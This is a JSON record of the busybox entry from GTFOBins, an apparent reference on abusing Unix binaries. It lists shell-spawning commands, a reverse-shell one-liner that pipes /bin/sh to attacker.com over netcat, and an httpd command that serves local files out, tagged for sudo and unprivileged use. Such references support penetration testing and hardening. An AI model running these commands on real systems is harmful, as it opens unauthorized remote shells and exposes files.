{"title": "busybox", "source": "gtfobins", "source_label": "GTFOBins", "path": "busybox", "html": "<h1>busybox</h1>\n<h2>Inherit</h2>\n<pre><code class=\"language-bash\">busybox ash</code></pre>\n<pre><code class=\"language-bash\">busybox cat</code></pre>\n<h2>Reverse Shell</h2>\n<pre><code class=\"language-bash\">busybox nc -e /bin/sh attacker.com 12345</code></pre>\n<h2>Upload</h2>\n<p>This serves files in the local folder via an HTTP server.</p>\n<pre><code class=\"language-bash\">busybox httpd -f -p 12345 -h .</code></pre>", "excerpt": "busybox Inherit busybox ash busybox cat Reverse Shell busybox nc -e /bin/sh attacker.com 12345 Upload This serves files in the local folder via an HTTP server. busybox httpd -f -p 12345 -h .", "tags": ["func:inherit", "func:reverse-shell", "func:upload", "ctx:sudo", "ctx:unprivileged"]}